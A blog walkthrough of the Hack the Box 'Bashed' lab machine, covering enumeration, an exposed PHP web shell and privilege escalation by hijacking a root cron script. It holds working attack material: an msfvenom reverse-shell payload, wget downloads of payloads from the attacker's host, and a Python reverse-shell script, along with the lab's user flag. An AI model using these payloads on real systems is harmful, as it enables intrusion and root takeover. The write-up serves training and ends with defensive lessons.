Skip to content

opcode

Hack the Box - Bashed

HTB, CTF2 min read

Summary

This was a pretty quick box, but for some reason, I always find boxes where you hijack an admin script running via root's cron fun to try. There are so many fun tricks to get a shell. A great list of reverse shells is here:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Enumeration

1root@kali:/home/kali/htb/bashed# nmap -sC -sV -p- -O -oN nmap_full 10.10.10.68
2Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 00:12 EDT
3Nmap scan report for 10.10.10.68
4Host is up (0.055s latency).
5Not shown: 65534 closed ports
6PORT  STATE SERVICE VERSION
780/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
8|_http-server-header: Apache/2.4.18 (Ubuntu)
9|_http-title: Arrexel's Development Site
10No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
11
12Network Distance: 2 hops
1310.10.10.68
14
15OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
16Nmap done: 1 IP address (1 host up) scanned in 44.72 seconds

Port 80 - HTTP

There's a blog describing a php bash console.

images/image.png

It appears we're looking for a file called phpbash.php. This seems a good use case for ffuf.

1root@kali:/home/kali/htb/bashed# ffuf -w /opt/wordlists/common.txt -u http://10.10.10.68/FUZZ/phpbash.php -fs 42 -c -v
2
3        /'___\  /'___\          /'___\     
4      /\ \__/ /\ \__/  __  __  /\ \__/     
5      \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
6        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
7        \ \_\  \ \_\  \ \____/  \ \_\     
8          \/_/    \/_/  \/___/    \/_/     
9
10      v1.0.2
11________________________________________________
12
13 :: Method          : GET
14 :: URL              : http://10.10.10.68/FUZZ/phpbash.php
15 :: Follow redirects : false
16 :: Calibration      : false
17 :: Timeout          : 10
18 :: Threads          : 40
19 :: Matcher          : Response status: 200,204,301,302,307,401,403
20 :: Filter          : Response size: 42
21________________________________________________
22
23[Status: 403, Size: 307, Words: 22, Lines: 12]
24| URL | http://10.10.10.68/.htaccess/phpbash.php
25    * FUZZ: .htaccess
26
27[Status: 403, Size: 307, Words: 22, Lines: 12]
28| URL | http://10.10.10.68/.htpasswd/phpbash.php
29    * FUZZ: .htpasswd
30
31[Status: 403, Size: 302, Words: 22, Lines: 12]
32| URL | http://10.10.10.68/.hta/phpbash.php
33    * FUZZ: .hta
34
35[Status: 200, Size: 8151, Words: 3407, Lines: 216]
36| URL | http://10.10.10.68/dev/phpbash.php
37    * FUZZ: dev

Exploitation

Visiting http://10.10.10.68/dev/phpbash.php, I'm now the www-data user.

1www-data@bashed
2:/var/www/html/dev# whoami
3
4www-data
5www-data@bashed
6:/var/www/html/dev# uname -a
7
8Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
9www-data@bashed
10:/var/www/html/dev# cat /etc/*release*
11
12DISTRIB_ID=Ubuntu
13DISTRIB_RELEASE=16.04
14DISTRIB_CODENAME=xenial
15DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
16NAME="Ubuntu"
17VERSION="16.04.2 LTS (Xenial Xerus)"
18ID=ubuntu
19ID_LIKE=debian
20PRETTY_NAME="Ubuntu 16.04.2 LTS"
21VERSION_ID="16.04"
22HOME_URL="http://www.ubuntu.com/"
23SUPPORT_URL="http://help.ubuntu.com/"
24BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
25VERSION_CODENAME=xenial
26UBUNTU_CODENAME=xenial

images/image%201.png

1user.txt
22c281f318555dbc1b856957c7147bfc1

Privilege Escalation

Viewing all the hidden files in /home/arrexel, it seems this user has used sudo successfully.

1www-data@bashed
2:/home/arrexel# ls -alh
3
4total 36K
5drwxr-xr-x 4 arrexel arrexel 4.0K Dec 4 2017 .
6drwxr-xr-x 4 root root 4.0K Dec 4 2017 ..
7-rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history
8-rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout
9-rw-r--r-- 1 arrexel arrexel 3.7K Dec 4 2017 .bashrc
10drwx------ 2 arrexel arrexel 4.0K Dec 4 2017 .cache
11drwxrwxr-x 2 arrexel arrexel 4.0K Dec 4 2017 .nano
12-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile
13-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful
14-r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt

The passwd file contains another user called scriptmanager.

1[00;31m[-] Contents of /etc/passwd:[00m
2root:x:0:0:root:/root:/bin/bash
3daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4bin:x:2:2:bin:/bin:/usr/sbin/nologin
5sys:x:3:3:sys:/dev:/usr/sbin/nologin
6sync:x:4:65534:sync:/bin:/bin/sync
7games:x:5:60:games:/usr/games:/usr/sbin/nologin
8man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
9lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
10mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
11news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
12uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
13proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
14www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
15backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
16list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
17irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
18gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
19nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
20systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
21systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
22systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
23systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
24syslog:x:104:108::/home/syslog:/bin/false
25_apt:x:105:65534::/nonexistent:/bin/false
26messagebus:x:106:110::/var/run/dbus:/bin/false
27uuidd:x:107:111::/run/uuidd:/bin/false
28arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
29scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash

Since this is a php shell, and non-interactive, I want a more comfortable shell work with.

1root@kali:/home/kali/htb/bashed# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f elf -o shell

I stage the shell with python, and use wget to download it to /var/tmp.

1www-data@bashed:/var/tmp# wget http://10.10.14.2/shell
2--2020-06-13 22:07:51-- http://10.10.14.2/shell
3Connecting to 10.10.14.2:80... connected.
4HTTP request sent, awaiting response... 200 OK
5Length: 194 [application/octet-stream]
6Saving to: 'shell'
7
80K 100% 19.3M=0s
9
102020-06-13 22:07:51 (19.3 MB/s) - 'shell' saved [194/194]

There is a small problem with this webshell. It doesn't seem to parse + symbols correctly, so I use an alternate chmod command to set the binary as executable. Then, since this webshell seems like it might be running and terminating processes right away, I background the shell execution with an &.

1www-data@bashed:/var/tmp# chmod +x shell
2
3chmod: invalid mode: 'x'
4Try 'chmod --help' for more information.
5www-data@bashed:/var/tmp# chmod 0755 shell
6www-data:/var/tmp# ./shell &

My netcat listener catches the shell, and I use python to make it a pty.

1root@kali:/home/kali# nc -nvlp 443
2listening on [any] 443 ...
3connect to [10.10.14.2] from (UNKNOWN) [10.10.10.68] 59264
4python -c 'import pty; pty.spawn("/bin/sh")'
5$

There is an interesting file in /scripts.

1$ ls -alh /scripts
2ls: cannot access '/scripts/..': Permission denied
3ls: cannot access '/scripts/test.py': Permission denied
4ls: cannot access '/scripts/test.txt': Permission denied
5ls: cannot access '/scripts/.': Permission denied
6total 0
7d????????? ? ? ? ?            ? .
8d????????? ? ? ? ?            ? ..
9-????????? ? ? ? ?            ? test.py
10-????????? ? ? ? ?            ? test.txt

I try to cat the files but get a permission denied. Enumerating further, I notice www-data can run commands as scriptmanager.

1$ sudo -l
2Matching Defaults entries for www-data on bashed:
3    env_reset, mail_badpass,
4    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
5
6User www-data may run the following commands on bashed:
7    (scriptmanager : scriptmanager) NOPASSWD: ALL

I can spawn another shell as scriptmanager to try and view the files.

1$ sudo -u scriptmanager /bin/bash
2scriptmanager@bashed:/var/tmp$ ls -alh /scripts
3total 16K
4drwxrwxr--  2 scriptmanager scriptmanager 4.0K Dec  4  2017 .
5drwxr-xr-x 23 root          root          4.0K Dec  4  2017 ..
6-rw-r--r--  1 scriptmanager scriptmanager  58 Dec  4  2017 test.py
7-rw-r--r--  1 root          root            12 Jun 13 22:25 test.txt

The files are now readable. I noticed the test.txt file is owned by root. It appears root is actually user executing the script.

1scriptmanager@bashed:/var/tmp$ cat /scripts/test.py
2f = open("test.txt", "w")
3f.write("testing 123!")
4f.close
5scriptmanager@bashed:/var/tmp$ cat /scripts/test.txt
6cat /scripts/test.txt
7testing 123!

All I need to do now is modify the script to run code for a reverse shell. I take some python from PayloadsAllTheThings and tweak it a bit.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

1import socket,os,pty
2s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
3s.connect(("10.10.14.2",80))
4os.dup2(s.fileno(),0)
5os.dup2(s.fileno(),1)
6os.dup2(s.fileno(),2)
7pty.spawn("/bin/bash")

I save this to a file on my kali machine, then I serve it up via a smbserver.py and overwrite the test.py file.

1scriptmanager@bashed:/scripts$ wget http://10.10.14.2/shell.py
2--2020-06-13 22:57:01--  http://10.10.14.2/shell.py
3Connecting to 10.10.14.2:80... connected.
4HTTP request sent, awaiting response... 200 OK
5Length: 190 [text/plain]
6Saving to: ‘shell.py’
7
8shell.py            100%[===================>]    190  --.-KB/s    in 0s     
9
102020-06-13 22:57:01 (20.9 MB/s) - ‘shell.py’ saved [190/190]
11
12scriptmanager@bashed:/scripts$ mv shell.py test.py

I open a netcat listener, and in a few seconds, the reverse shell connects.

images/image%202.png

Defensive Lessons Learned

Security through obscurity gets a bad rap, but it isn't enough, especially when you're sharing a web shell publicly.

The web shell gave me a low-privilege shell, and chance to escalate privileges. There should be authentication in front of any type of shell or remote terminal.

Then, an admin script was running as root, but a low-privilege user was allowed to edit the script via sudo privileges.

Ideally, any service accounts such as www-data should have privileges confined to just the files and services they need to access, and sudo permissions should be restricted. Theoretically, a web service user shouldn't even need write permissions to most things unless the web app is saving files.

Offensive Lessons Learned

Always check sudo -l, and keep your eyes open for any lazy admin scripts that might be available to hijack.